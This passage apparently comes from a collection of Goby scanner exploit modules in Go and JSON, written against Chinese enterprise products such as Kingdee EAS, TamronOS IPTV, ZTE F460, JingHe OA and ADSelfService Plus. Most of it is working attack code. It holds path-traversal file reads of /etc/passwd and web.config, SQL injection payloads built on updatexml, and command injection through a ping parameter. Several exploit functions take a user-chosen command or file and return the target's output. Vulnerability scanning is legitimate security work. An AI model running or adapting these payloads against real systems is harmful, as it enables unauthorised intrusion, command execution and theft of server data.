", 25 | "Recommendation": "Update", 26 | "References": [ 27 | "http://wiki.peiqi.tech" 28 | ], 29 | "HasExp": true, 30 | "ExpParams": [ 31 | { 32 | "name": "File", 33 | "type": "input", 34 | "value": "/c6/web.config" 35 | } 36 | ], 37 | "ScanSteps": [ 38 | "AND" 39 | ], 40 | "ExploitSteps": null, 41 | "Tags": [ 42 | "File read" 43 | ], 44 | "CVEIDs": null, 45 | "CVSSScore": "0.0", 46 | "AttackSurfaces": { 47 | "Application": [ 48 | "JingHe OA" 49 | ], 50 | "Support": null, 51 | "Service": null, 52 | "System": null, 53 | "Hardware": null 54 | }, 55 | "Recommandation": "

undefined

" 56 | }` 57 | 58 | ExpManager.AddExploit(NewExploit( 59 | goutils.GetFileName(), 60 | expJson, 61 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 62 | uri := "/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config" 63 | cfg := httpclient.NewGetRequestConfig(uri) 64 | cfg.VerifyTls = false 65 | cfg.FollowRedirect = false 66 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 67 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 68 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "configuration") 69 | } 70 | return false 71 | }, 72 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 73 | file := ss.Params["File"].(string) 74 | uri := "/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=" + file 75 | cfg := httpclient.NewGetRequestConfig(uri) 76 | cfg.VerifyTls = false 77 | cfg.FollowRedirect = false 78 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 79 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 80 | if resp.StatusCode == 200 { 81 | expResult.Output = resp.RawBody 82 | expResult.Success = true 83 | } 84 | } 85 | return expResult 86 | }, 87 | )) 88 | } -------------------------------------------------------------------------------- /go/Kingdee_EAS_server_file_Directory_traversal.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "Kingdee EAS server_file Directory traversal", 16 | "Description": "Kingdee EAS server file Directory traversal,The attacker can obtain the sensitive information of the server through directory traversal", 17 | "Product": "Kingdee EAS", 18 | "Homepage": "https://www.kingdee.com/", 19 | "DisclosureDate": "2021-06-03", 20 | "Author": "PeiQi", 21 | "GobyQuery": "app=\"kingdee-EAS\"", 22 | "Level": "1", 23 | "Impact": "

Directory traversal

", 24 | "Recommendation": "", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": true, 29 | "ExpParams": [ 30 | { 31 | "name": "Dir", 32 | "type": "input", 33 | "value": "/" 34 | } 35 | ], 36 | "ExpTips": { 37 | "Type": "", 38 | "Content": "" 39 | }, 40 | "ScanSteps": [ 41 | "AND" 42 | ], 43 | "ExploitSteps": null, 44 | "Tags": [ 45 | "Directory traversal" 46 | ], 47 | "CVEIDs": null, 48 | "CVSSScore": "0.0", 49 | "AttackSurfaces": { 50 | "Application": [ 51 | "Kingdee EAS" 52 | ], 53 | "Support": null, 54 | "Service": null, 55 | "System": null, 56 | "Hardware": null 57 | }, 58 | "Recommandation": "

undefined

" 59 | }` 60 | 61 | ExpManager.AddExploit(NewExploit( 62 | goutils.GetFileName(), 63 | expJson, 64 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 65 | uri := "/appmonitor/protected/selector/server_file/files?folder=/&suffix=" 66 | cfg := httpclient.NewGetRequestConfig(uri) 67 | cfg.VerifyTls = false 68 | cfg.FollowRedirect = false 69 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 70 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 71 | return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "folder") 72 | } 73 | return false 74 | }, 75 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 76 | dir := ss.Params["Dir"].(string) 77 | uri := "/appmonitor/protected/selector/server_file/files?folder=" + dir + "&suffix=" 78 | cfg := httpclient.NewGetRequestConfig(uri) 79 | cfg.VerifyTls = false 80 | cfg.FollowRedirect = false 81 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 82 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 83 | re := regexp.MustCompile(`"path":"(.*?)"`).FindAllString(resp.RawBody, -1) 84 | data := "" 85 | for _, path := range re { 86 | data += path + "\r\n" 87 | } 88 | expResult.Output = data 89 | expResult.Success = true 90 | } 91 | return expResult 92 | }, 93 | )) 94 | } 95 | -------------------------------------------------------------------------------- /go/Qilai_OA_CloseMsg.aspx_SQL_injection.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "Qilai OA CloseMsg.aspx SQL injection", 15 | "Description": "Qilai OA CloseMsg.aspx SQL injection", 16 | "Product": "Qilai OA", 17 | "Homepage": "https://qioa.company.xuanruanjian.com/", 18 | "DisclosureDate": "2021-05-18", 19 | "Author": "PeiQi", 20 | "GobyQuery": "app=\"qiOA\"", 21 | "Level": "2", 22 | "Impact": "SQL injection", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": false, 28 | "ExpParams": null, 29 | "ExpTips": { 30 | "Type": "", 31 | "Content": "" 32 | }, 33 | "ScanSteps": [ 34 | "AND", 35 | { 36 | "Request": { 37 | "data": "", 38 | "data_type": "text", 39 | "follow_redirect": true, 40 | "method": "GET", 41 | "uri": "/" 42 | }, 43 | "ResponseTest": { 44 | "checks": [ 45 | { 46 | "bz": "", 47 | "operation": "==", 48 | "type": "item", 49 | "value": "200", 50 | "variable": "$code" 51 | } 52 | ], 53 | "operation": "AND", 54 | "type": "group" 55 | } 56 | } 57 | ], 58 | "ExploitSteps": null, 59 | "Tags": ["SQL injection"], 60 | "CVEIDs": null, 61 | "CVSSScore": "0.0", 62 | "AttackSurfaces": { 63 | "Application": ["qiOA"], 64 | "Support": null, 65 | "Service": null, 66 | "System": null, 67 | "Hardware": null 68 | } 69 | }` 70 | 71 | ExpManager.AddExploit(NewExploit( 72 | goutils.GetFileName(), 73 | expJson, 74 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 75 | uri := "/client/CloseMsg.aspx?user='&pwd=1" 76 | cfg := httpclient.NewGetRequestConfig(uri) 77 | cfg.VerifyTls = false 78 | cfg.FollowRedirect = false 79 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 80 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 81 | return resp.StatusCode == 500 && strings.Contains(resp.Utf8Html, "C4CA4238A0B923820DCC509A6F75849B") 82 | } 83 | return false 84 | }, 85 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 86 | return expResult 87 | }, 88 | )) 89 | } -------------------------------------------------------------------------------- /go/ShiziyuCms_ApiController.class.php_SQL_injection.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "ShiziyuCms ApiController.class.php SQL injection", 16 | "Description": "ShiziyuCms ApiController.class.php SQL injection", 17 | "Product": "ShiziyuCms", 18 | "Homepage": "https://www.tyha.cn/", 19 | "DisclosureDate": "2021-05-18", 20 | "Author": "PeiQi", 21 | "GobyQuery": "body=\"/seller.php?s=/Public/login\"", 22 | "Level": "2", 23 | "Impact": "SQL injection", 24 | "Recommendation": "", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": false, 29 | "ExpParams": null, 30 | "ExpTips": { 31 | "Type": "", 32 | "Content": "" 33 | }, 34 | "ScanSteps": [ 35 | "AND", 36 | { 37 | "Request": { 38 | "data": "", 39 | "data_type": "text", 40 | "follow_redirect": true, 41 | "method": "GET", 42 | "uri": "/" 43 | }, 44 | "ResponseTest": { 45 | "checks": [ 46 | { 47 | "bz": "", 48 | "operation": "==", 49 | "type": "item", 50 | "value": "200", 51 | "variable": "$code" 52 | } 53 | ], 54 | "operation": "AND", 55 | "type": "group" 56 | } 57 | } 58 | ], 59 | "ExploitSteps": null, 60 | "Tags": ["SQL injection"], 61 | "CVEIDs": null, 62 | "CVSSScore": "0.0", 63 | "AttackSurfaces": { 64 | "Application": ["ShiziyuCms"], 65 | "Support": null, 66 | "Service": null, 67 | "System": null, 68 | "Hardware": null 69 | } 70 | }` 71 | 72 | ExpManager.AddExploit(NewExploit( 73 | goutils.GetFileName(), 74 | expJson, 75 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 76 | uri := "/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)" 77 | cfg := httpclient.NewGetRequestConfig(uri) 78 | cfg.VerifyTls = false 79 | cfg.FollowRedirect = false 80 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 81 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 82 | return strings.Contains(resp.RawBody, "c4ca4238a0b923820dcc509a6f75849") 83 | } 84 | return false 85 | }, 86 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 87 | return expResult 88 | }, 89 | )) 90 | } -------------------------------------------------------------------------------- /go/ShiziyuCms_ApigoodsController.class.php_SQL_injection.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "ShiziyuCms ApigoodsController.class.php SQL injection", 16 | "Description": "ShiziyuCms ApigoodsController.class.php SQL injection", 17 | "Product": "ShiziyuCms", 18 | "Homepage": "https://www.tyha.cn/", 19 | "DisclosureDate": "2021-05-18", 20 | "Author": "PeiQi", 21 | "GobyQuery": "body=\"/seller.php?s=/Public/login\"", 22 | "Level": "2", 23 | "Impact": "SQL injection", 24 | "Recommendation": "", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": false, 29 | "ExpParams": null, 30 | "ExpTips": { 31 | "Type": "", 32 | "Content": "" 33 | }, 34 | "ScanSteps": [ 35 | "AND", 36 | { 37 | "Request": { 38 | "data": "", 39 | "data_type": "text", 40 | "follow_redirect": true, 41 | "method": "GET", 42 | "uri": "/" 43 | }, 44 | "ResponseTest": { 45 | "checks": [ 46 | { 47 | "bz": "", 48 | "operation": "==", 49 | "type": "item", 50 | "value": "200", 51 | "variable": "$code" 52 | } 53 | ], 54 | "operation": "AND", 55 | "type": "group" 56 | } 57 | } 58 | ], 59 | "ExploitSteps": null, 60 | "Tags": ["SQL injection"], 61 | "CVEIDs": null, 62 | "CVSSScore": "0.0", 63 | "AttackSurfaces": { 64 | "Application": ["ShiziyuCms"], 65 | "Support": null, 66 | "Service": null, 67 | "System": null, 68 | "Hardware": null 69 | } 70 | }` 71 | 72 | ExpManager.AddExploit(NewExploit( 73 | goutils.GetFileName(), 74 | expJson, 75 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 76 | uri := "/index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)" 77 | cfg := httpclient.NewGetRequestConfig(uri) 78 | cfg.VerifyTls = false 79 | cfg.FollowRedirect = false 80 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 81 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 82 | return strings.Contains(resp.RawBody, "c4ca4238a0b923820dcc509a6f75849") 83 | } 84 | return false 85 | }, 86 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 87 | return expResult 88 | }, 89 | )) 90 | } -------------------------------------------------------------------------------- /go/TamronOS_IPTV_ping_RCE.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "TamronOS IPTV ping RCE", 16 | "Description": "There is an arbitrary command execution vulnerability in the api/ping of tamronos IPTV system, through which attackers can execute arbitrary commands", 17 | "Product": "TamronOS IPTV", 18 | "Homepage": "http://www.tamronos.com/", 19 | "DisclosureDate": "2021-06-15", 20 | "Author": "PeiQi", 21 | "GobyQuery": "title=\"TamronOS IPTV系统\"", 22 | "Level": "3", 23 | "Impact": "

RCE

", 24 | "Recommendation": "Update", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": true, 29 | "ExpParams": [ 30 | { 31 | "name": "Cmd", 32 | "type": "input", 33 | "value": "id" 34 | } 35 | ], 36 | "ScanSteps": [ 37 | "AND" 38 | ], 39 | "ExploitSteps": null, 40 | "Tags": [ 41 | "RCE" 42 | ], 43 | "CVEIDs": null, 44 | "CVSSScore": "0.0", 45 | "AttackSurfaces": { 46 | "Application": [ 47 | "TamronOS IPTV" 48 | ], 49 | "Support": null, 50 | "Service": null, 51 | "System": null, 52 | "Hardware": null 53 | }, 54 | "Recommandation": "

undefined

" 55 | }` 56 | 57 | ExpManager.AddExploit(NewExploit( 58 | goutils.GetFileName(), 59 | expJson, 60 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 61 | uri := "/api/ping?count=5&host=;id;" 62 | cfg := httpclient.NewGetRequestConfig(uri) 63 | cfg.VerifyTls = false 64 | cfg.FollowRedirect = false 65 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 66 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 67 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "uid=") 68 | } 69 | return false 70 | }, 71 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 72 | cmd := ss.Params["Cmd"].(string) 73 | cmd = strings.Replace(cmd, " ", "%20", -1) 74 | uri := "/api/ping?count=5&host=;" + cmd + ";" 75 | cfg := httpclient.NewGetRequestConfig(uri) 76 | cfg.VerifyTls = false 77 | cfg.FollowRedirect = false 78 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 79 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 80 | if resp.StatusCode == 200 { 81 | re := regexp.MustCompile(`"result":"(.*?)"`).FindStringSubmatch(resp.RawBody)[1] 82 | expResult.Output = re 83 | expResult.Success = true 84 | } 85 | } 86 | return expResult 87 | }, 88 | )) 89 | } 90 | 91 | -------------------------------------------------------------------------------- /go/ZhongkeWangwei_Next_generation_firewall_File_read.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "regexp" 10 | "strings" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "ZhongkeWangwei Next generation firewall File read", 16 | "Description": "ZhongkeWangwei Next generation firewall File read, There is an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information", 17 | "Product": "ZhongkeWangwei Next generation firewall", 18 | "Homepage": "http://www.netpower.com.cn/", 19 | "DisclosureDate": "2021-06-02", 20 | "Author": "PeiQi", 21 | "GobyQuery": "body=\"Get_Verify_Info(hex_md5(user_string).\"", 22 | "Level": "2", 23 | "Impact": "

File read

", 24 | "Recommendation": "", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": true, 29 | "ExpParams": [ 30 | { 31 | "name": "File", 32 | "type": "input", 33 | "value": "/etc/passwd" 34 | } 35 | ], 36 | "ScanSteps": [ 37 | "AND" 38 | ], 39 | "ExploitSteps": null, 40 | "Tags": [ 41 | "File Read" 42 | ], 43 | "CVEIDs": null, 44 | "CVSSScore": "0.0", 45 | "AttackSurfaces": { 46 | "Application": [ 47 | "ZhongkeWangwei Next generation firewall" 48 | ], 49 | "Support": null, 50 | "Service": null, 51 | "System": null, 52 | "Hardware": null 53 | }, 54 | "Recommandation": "

update

" 55 | }` 56 | 57 | ExpManager.AddExploit(NewExploit( 58 | goutils.GetFileName(), 59 | expJson, 60 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 61 | uri := "/download.php?&class=vpn&toolname=../../../../../../../../etc/passwd" 62 | cfg := httpclient.NewPostRequestConfig(uri) 63 | cfg.VerifyTls = false 64 | cfg.FollowRedirect = false 65 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 66 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 67 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "root") 68 | } 69 | return false 70 | }, 71 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 72 | file := ss.Params["File"].(string) 73 | uri := "/download.php?&class=vpn&toolname=../../../../../../../.." + file 74 | cfg := httpclient.NewPostRequestConfig(uri) 75 | cfg.VerifyTls = false 76 | cfg.FollowRedirect = false 77 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 78 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 79 | if resp.StatusCode == 200 { 80 | expResult.Output = resp.Utf8Html 81 | expResult.Success = true 82 | } 83 | } 84 | return expResult 85 | }, 86 | )) 87 | } 88 | -------------------------------------------------------------------------------- /go/Zhongxing_F460_web_shell_cmd.gch_RCE.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | ) 11 | 12 | func init() { 13 | expJson := `{ 14 | "Name": "Zhongxing F460 web_shell_cmd.gch RCE", 15 | "Description": "Zhongxing F460 web_shell_cmd.gch RCE", 16 | "Product": "Zhongxing F460", 17 | "Homepage": "https://www.zte.com.cn/", 18 | "DisclosureDate": "2021-05-18", 19 | "Author": "PeiQi", 20 | "GobyQuery": "app=\"ZTE-ZXA10F460\"", 21 | "Level": "3", 22 | "Impact": "RCE", 23 | "Recommendation": "", 24 | "References": [ 25 | "http://wiki.peiqi.tech" 26 | ], 27 | "HasExp": false, 28 | "ExpParams": null, 29 | "ScanSteps": [ 30 | "AND", 31 | { 32 | "Request": { 33 | "data": "", 34 | "data_type": "text", 35 | "follow_redirect": true, 36 | "method": "GET", 37 | "uri": "/" 38 | }, 39 | "ResponseTest": { 40 | "checks": [ 41 | { 42 | "bz": "", 43 | "operation": "==", 44 | "type": "item", 45 | "value": "200", 46 | "variable": "$code" 47 | } 48 | ], 49 | "operation": "AND", 50 | "type": "group" 51 | } 52 | } 53 | ], 54 | "ExploitSteps": null, 55 | "Tags": ["RCE"], 56 | "CVEIDs": null, 57 | "CVSSScore": "0.0", 58 | "AttackSurfaces": { 59 | "Application": ["WangKang Next generation firewall"], 60 | "Support": null, 61 | "Service": null, 62 | "System": null, 63 | "Hardware": null 64 | } 65 | }` 66 | 67 | ExpManager.AddExploit(NewExploit( 68 | goutils.GetFileName(), 69 | expJson, 70 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 71 | uri := "/web_shell_cmd.gch" 72 | cfg := httpclient.NewPostRequestConfig(uri) 73 | cfg.VerifyTls = false 74 | cfg.FollowRedirect = false 75 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 76 | cfg.Data = "IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=ls&CmdAck=" 77 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 78 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "root") 79 | } 80 | return false 81 | }, 82 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 83 | return expResult 84 | }, 85 | )) 86 | } -------------------------------------------------------------------------------- /go/nsoft_EWEBS_casmain.xgi_File_read.go: -------------------------------------------------------------------------------- 1 | package exploits 2 | 3 | import ( 4 | "fmt" 5 | "git.gobies.org/goby/goscanner/goutils" 6 | "git.gobies.org/goby/goscanner/jsonvul" 7 | "git.gobies.org/goby/goscanner/scanconfig" 8 | "git.gobies.org/goby/httpclient" 9 | "strings" 10 | "regexp" 11 | ) 12 | 13 | func init() { 14 | expJson := `{ 15 | "Name": "nsoft-EWEBS casmain.xgi File read", 16 | "Description": "nsoft EWEBS casmain.xgi File read, can read any file server", 17 | "Product": "nsoft EWEBS", 18 | "Homepage": "http://www.n-soft.com.cn/", 19 | "DisclosureDate": "2021-06-15", 20 | "Author": "PeiQi", 21 | "GobyQuery": "app=\"nsoft-EWEBS\"", 22 | "Level": "2", 23 | "Impact": "

File read

", 24 | "Recommendation": "Update", 25 | "References": [ 26 | "http://wiki.peiqi.tech" 27 | ], 28 | "HasExp": true, 29 | "ExpParams": [ 30 | { 31 | "name": "File", 32 | "type": "input", 33 | "value": "../../Data/CONFIG/CasDbCnn.dat" 34 | } 35 | ], 36 | "ScanSteps": [ 37 | "AND" 38 | ], 39 | "ExploitSteps": null, 40 | "Tags": [ 41 | "File read" 42 | ], 43 | "CVEIDs": null, 44 | "CVSSScore": "0.0", 45 | "AttackSurfaces": { 46 | "Application": [ 47 | "nsoft EWEBS" 48 | ], 49 | "Support": null, 50 | "Service": null, 51 | "System": null, 52 | "Hardware": null 53 | }, 54 | "Recommandation": "

undefined

" 55 | }` 56 | 57 | ExpManager.AddExploit(NewExploit( 58 | goutils.GetFileName(), 59 | expJson, 60 | func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 61 | uri := "/casmain.xgi" 62 | cfg := httpclient.NewPostRequestConfig(uri) 63 | cfg.VerifyTls = false 64 | cfg.FollowRedirect = false 65 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 66 | cfg.Data = "Language_S=../../../../../../../windows/win.ini" 67 | if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil { 68 | return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "for 16-bit app support") 69 | } 70 | return false 71 | }, 72 | func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 73 | file := ss.Params["File"].(string) 74 | uri := "/casmain.xgi" 75 | cfg := httpclient.NewPostRequestConfig(uri) 76 | cfg.VerifyTls = false 77 | cfg.FollowRedirect = false 78 | cfg.Header.Store("Content-type", "application/x-www-form-urlencoded") 79 | cfg.Data = "Language_S=../../../../../../../windows/win.ini" 80 | if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil { 81 | if resp.StatusCode == 200 { 82 | expResult.Output = resp.RawBody 83 | expResult.Success = true 84 | } 85 | } 86 | return expResult 87 | }, 88 | )) 89 | } 90 | 91 | -------------------------------------------------------------------------------- /json/360_TianQing_ccid_SQL_injectable.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "360 TianQing ccid SQL injectable", 3 | "Level": "2", 4 | "Tags": [], 5 | "GobyQuery": "app=\"360-TianQing\"", 6 | "Description": "The attacker can get the server permission by injecting SQL into the upload Trojan", 7 | "Product": "360 TianQing", 8 | "Homepage": "htp://360.cn", 9 | "Author": "PeiQi", 10 | "Impact": "

The attacker can get the server permission by injecting SQL into the upload Trojan

", 11 | "Recommandation": "", 12 | "References": [ 13 | "http://wiki.peiqi.tech" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/api/dp/rptsvcsyncpoint?ccid=1", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "result", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "success", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$body", 54 | "operation": "not contains", 55 | "value": "10001", 56 | "bz": "" 57 | } 58 | ] 59 | }, 60 | "SetVariable": [] 61 | } 62 | ], 63 | "PostTime": "2021-04-09 08:51:50", 64 | "GobyVersion": "1.8.255" 65 | } -------------------------------------------------------------------------------- /json/360_Tianqing_database_information_disclosure.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "360 Tianqing database information disclosure", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"360-TianQing\"", 8 | "Description": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information", 9 | "Product": "360 Tianqing", 10 | "Homepage": "https://www.360.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/api/dbstat/gettablessize", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "schema_name", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "table_name", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "table_size", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [] 63 | } 64 | ], 65 | "PostTime": "2021-04-08 16:04:28", 66 | "GobyVersion": "1.8.255" 67 | } -------------------------------------------------------------------------------- /json/ADSelfService_Plus_RCE_CVE_2021_40539.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ADSelfService Plus RCE CVE-2021-40539", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce", 6 | "unauth" 7 | ], 8 | "GobyQuery": "(title=\"ManageEngine - ADSelfService Plus\" | app=\"ZOHO-ManageEngine-ADSelfService\" | title==\"ADSelfService Plus\" | body=\"ADSelfService Plus\")", 9 | "Description": "Zoho ManageEngine ADSelfService Plus 6113版本及更早版本存在授权问题漏洞,该漏洞源于软件很容易绕过REST API认证,从而导致远程代码执行", 10 | "Product": "ADSelfService Plus", 11 | "Homepage": "https://www.manageengine.cn/products/self-service-password/pricing-details.html", 12 | "Author": "aetkrad", 13 | "Impact": "", 14 | "Recommendation": "", 15 | "References": [ 16 | "https://forum.butian.net/share/876" 17 | ], 18 | "HasExp": false, 19 | "ExpParams": null, 20 | "ExpTips": { 21 | "Type": "", 22 | "Content": "" 23 | }, 24 | "ScanSteps": [ 25 | "AND", 26 | { 27 | "Request": { 28 | "method": "POST", 29 | "uri": "/./RestAPI/LogonCustomization", 30 | "follow_redirect": false, 31 | "header": { 32 | "Content-Type": "application/x-www-form-urlencoded" 33 | }, 34 | "data_type": "text", 35 | "data": "methodToCall=previewMobLogo", 36 | "set_variable": [] 37 | }, 38 | "ResponseTest": { 39 | "type": "group", 40 | "operation": "AND", 41 | "checks": [ 42 | { 43 | "type": "item", 44 | "variable": "$code", 45 | "operation": "==", 46 | "value": "200", 47 | "bz": "" 48 | }, 49 | { 50 | "type": "item", 51 | "variable": "$body", 52 | "operation": "contains", 53 | "value": "var d = new Date();", 54 | "bz": "" 55 | }, 56 | { 57 | "type": "item", 58 | "variable": "$body", 59 | "operation": "contains", 60 | "value": 